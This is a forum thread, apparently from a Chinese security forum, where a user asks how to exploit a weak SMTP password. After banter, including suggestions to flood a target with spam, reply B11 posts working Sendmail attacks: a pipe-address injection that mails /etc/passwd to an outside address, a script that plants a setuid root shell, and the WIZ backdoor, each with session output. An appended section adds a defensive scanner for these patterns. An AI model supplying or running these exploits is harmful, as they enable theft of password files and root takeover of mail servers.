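Author: kubingkkk [kubingkkk] Forum user
I've got an SMTP weak password, how do I make use of it?
Original post  Posted: 01/18 01:27
Reply: vishx [vishx] Forum user
Scan with XSCAN
Reply B1  Posted: 01/18 07:49
Reply: junjuntop [junjuntop] Forum user
Isn't that a pointless thing to say? How would he know it was there if he hadn't scanned? He already knows it's there, so what are you telling him to scan for? I give up!~~~~~~~~~~~~
Reply B2  Posted: 01/18 09:34
Reply: alixlinn [alixlinn] Forum user
Don't know, never used it, want to know, nobody to teach me
Reply B3  Posted: 01/18 12:11
Reply: playopy [playopy] Forum user
Is it any use? I've never tried it.
Reply B4  Posted: 01/18 12:31
Reply: junjuntop [junjuntop] Forum user
The people at 20cn will all teach you
Reply B5  Posted: 01/18 15:47
Reply: hebin [hebin] Forum user
Ugh~~~
Reply B6  Posted: 01/18 17:32
Reply: yaochi [yaochi] Forum user
I asked 不象 before; I think he said it's for sending spam, not much use
Reply B7  Posted: 01/18 18:33
Reply: junjuntop [junjuntop] Forum user
I give up
Reply B8  Posted: 01/18 18:35
Reply: alixlinn [alixlinn] Forum user
Oh, that's fine too, flood him with spam until he chokes
Reply B9  Posted: 01/18 21:30
Reply: bking [bking] Moderator
Damn! Not one of you is on topic!
Reply B10  Posted: 01/18 21:41
Reply: vishx [vishx] Forum user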
.smtp
First look at a few old sendmail holes; the prerequisite is that you have a valid user account:

Getting passwd on sendmail 5.55, much the same as above:

    # telnet www.target.com 25
    Trying 127.0.0.1...
    Connected to www.target.com
    Escape character is '^]'.
    220 www.target.com Sendmail 5.55 ready at Saturday, 12 Oct 00 12:34
    mail from: "|/bin/mail admin@root.com.cn < /etc/passwd"
    250 "|/bin/mail admin@root.com.cn < /etc/passwd"... Sender ok
    rcpt to: nosuchuser
    550 nosuchuser... User unknown
    data
    354 Enter mail, end with "." on a line by itself
    ..
    250 Mail accepted
    quit
    Connection closed by foreign host.

Now look at the hole in 8.7:

    # telnet www.target.com 25
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    220 www.target.com ESMTP Sendmail 8.7.5/8.7.3; Saturday, 12 Oct 00 12:34
    quit
    221 localhost closing connection
    Connection closed by foreign host.
    # telnet www.target.com
    hackerworld(SunOS)
    login: nice
    Password:
    Last login: Sun May 10 6:15:23 from *.*.*.*
    You have new mail.
    $ cat >send.sh
    ----------------------------send.sh begin-------------------------------------
    #/bin/sh
    echo 'main() '>>leshka.c
    echo '{ '>>leshka.c
    echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
    echo '}'>>leshka.c
    #
    #
    echo 'main() '>>smtpd.c
    echo '{ '>>smtpd.c
    echo ' setuid(0); setgid(0); '>>smtpd.c
    echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
    echo '}'>>smtpd.c
    #
    #
    cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
    ./leshka
    kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n" |head -n 1`
    rm leshka.c leshka smtpd.c /tmp/smtpd
    echo "Now type: /tmp/sh"
    -------------------------------send.sh end------------------------------------
    $ chmod 755 send.sh
    $ ./send.sh
    Now type: /tmp/sh
    $ /tmp/sh
    # whoami
    root

There is also the WIZ backdoor:

    # telnet www.target.com 25
    Trying 127.0.0.1...
    Connected to www.target.com
    Escape character is '^]'.
    220 www.target.com Sendmail 5.55 ready at Saturday, 12 Oct 00 12:34
    wiz
    Sh*ll
    $
Reply B11  Posted: 01/19 07:57
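Added example, not part of the thread or written by any of its posters: a defender-side check that scans an SMTP session transcript for the three things visible in the sessions quoted in reply B11 (an envelope address beginning with a pipe, the `wiz` command, and a banner announcing one of the Sendmail releases the post names). The transcript lines, hostnames and the `classify`/`scan` names are constructed for illustration.

```python
import re

# Patterns taken from the sessions quoted in the post above.
PIPE_ADDR = re.compile(r'^\s*(?:mail\s+from|rcpt\s+to)\s*:\s*[<"]?\s*\|', re.I)
WIZ_CMD = re.compile(r'^\s*wiz\b', re.I)
BANNER = re.compile(r'^220\s+\S+\s+(?:ESMTP\s+)?Sendmail\s+(\d+(?:\.\d+)+)', re.I)
# Release lines the post names; other versions are not judged by this script.
NAMED_VERSIONS = ("5.55", "8.7")


def classify(line):
    """Return a finding label for one SMTP transcript line, or None."""
    if PIPE_ADDR.match(line):
        return "pipe-address"
    if WIZ_CMD.match(line):
        return "wiz-command"
    m = BANNER.match(line)
    if m:
        ver = m.group(1)
        if any(ver == v or ver.startswith(v + ".") for v in NAMED_VERSIONS):
            return "legacy-banner:" + ver
    return None


def scan(lines):
    """Return (line_number, label) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        label = classify(line)
        if label:
            hits.append((n, label))
    return hits


# Constructed transcript lines (not real traffic); hostnames are placeholders.
SAMPLE = [
    "220 mx.example.test Sendmail 5.55 ready at Saturday, 12 Oct 00 12:34",
    'mail from: "|/bin/example-program"',
    "MAIL FROM:<alice@example.test>",
    "wiz",
    "220 mx2.example.test ESMTP Sendmail 8.7.5/8.7.3; Saturday, 12 Oct 00 12:34",
    "220 mx3.example.test ESMTP Sendmail 8.15.2/8.15.2; Mon, 1 Jan 2024 00:00:00",
    "RCPT TO:<wizard@example.test>",
]

if __name__ == "__main__":
    for n, label in scan(SAMPLE):
        print(n, label)
```

Ordinary envelope lines, a recipient whose name merely starts with "wiz", and banners for releases the post does not mention are left unflagged.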
Copyright 20CN Network Security Group
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
Forum software written by: NetDemon
Guangdong ICP Registration No. 05087286